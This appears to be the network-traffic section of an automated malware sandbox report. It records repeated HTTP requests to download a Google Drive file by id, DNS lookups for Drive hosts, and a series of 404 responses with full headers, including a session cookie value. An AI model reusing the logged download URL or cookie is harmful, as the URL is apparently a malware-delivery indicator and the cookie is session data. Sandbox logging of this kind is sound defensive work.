      Source: global trafficHTTP traffic detected: GET /download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
      Source: global trafficHTTP traffic detected: GET /download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
      Source: global trafficHTTP traffic detected: GET /download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
      Source: global trafficHTTP traffic detected: GET /download?id=1V--E9HGynPt93xpQhV1zy1K5eJxu_tls&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ
      Source: global trafficDNS traffic detected: DNS query: drive.google.com
      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC77QUmrDVMiTRncsNSvDJp_zXgMUc9JUEgPfCXC2HodF_E61GtyYACKLB-IV_Q2BABg1m1NAZAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:16:20 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-MCbsrMTjJ6WVhEcrwrVhyg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerSet-Cookie: NID=520=ZBKOThf7eXXxWdI9b4HtbzU0JOQOdL5bKciLrai1DINgY7c_dKQn0dyqO0QMrWMXFFQYOSomsrjgT2gPdglJ4nWB-USB7wa5u_po_GZ9uOMSm1qLvOF56CsDYTiLnZVnPyTNB16scpuM2b_5eRdeSY6Yn7cgU14mb-NtGzR1huuPScjTWqXKJUHpZ0c_S1m9ZQ; expires=Sat, 12-Jul-2025 14:16:20 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQat30fzFAgI8QZEYdyq6HYXF6c6p6UvG9q_V5Pe8OWKjKs19yLeBrEulo1vFLLLU9YContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:16:22 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-tgdC_fHb8WKZ21Og2b6ocQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgSgMjT3ChTXkj4v1iF_2GQ5PSkMsaXysGusCdVi884oCnU_pTyUaKO8Bg0zm4DLhoE3Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:16:25 GMTContent-Security-Policy: script-src 'nonce-psRMHbmluWfdSwqnP4gHgQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRTYnoXupb7amqX4iU6r7PfiWX5A9pzjKjHNF-3TCiR9XuROx66ntmKdTkQ6BWBgpAbContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:16:27 GMTCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: script-src 'nonce-kyY2tjNo2FpN8THut1g5QA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC4CslTfWGSl5R8tG40IWjgAand3ceFpKh0lDsBSqbG9543qlG4KHcx4M-P1chlRHu10QoScpM4Content-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:16:30 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-KWbEQ_NwIL2BjakGt9R-dw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgTpPkOOOetlQSgeS_zLn_7Foe9EO6Ec5ZYEOnttX3VT4reaoggVtYfmlTWBaryVh8LxContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:16:32 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-Zq5_Shla6RebxsIP5qjQ2g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRqhlHxsyA8geqzfXTUgUHCP17lR0hKy7XNiY_PbxXWvumT3DF4KQmXm1D8IXYj9gSwO_TcMbMContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:16:35 GMTCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-qMKK1wLDB34wiWgmA9yTpQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgQWFXfNgV7BbCfRHp3XVJ5_flenCSiYHrTX3PW3kOavitprQqTCIo1381f2CBS-MCqvContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:16:37 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-VXRLM_55Opoep-Koys_K7A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFIdbgRRl9Cl0eWslzj11xJwB4xxz77H6a2r10gcGeS8ln_rnWdFPmOD0xZPA5ql7WJ1lYiPmKUF6jcContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:16:39 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-5MacaLhm3Hk98SqFRZCc9A' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5IqaF5yWUKOIZz9Si-USSEJaga0FbEdgXihGhrm0cS-y7AoxP516MtptKN68O18FC-TUzw8SAContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:16:42 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-whAF82LKPgKWAii9A2IP6w' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC7ydmdqa4NfFsEELO7d5nE94x_gF1O9Bu5yo3FRn3GbG1p48o5pfY8UFkjNP0WT8e7B4f0a80gContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:16:44 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce--xTroAfW7XKoMfVfURLugA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundX-GUploader-UploadID: AFiumC5ygf49bG1Yy-djCKExptnIrEJUZIbKGsQ-C8wdn96QFsG7Hk6TgxZ8ZOs-8_cp5jGmvZORzlEContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Fri, 10 Jan 2025 14:16:46 GMTContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-MPKALXGbfgfF2TlzGL9Yrg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652Server: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
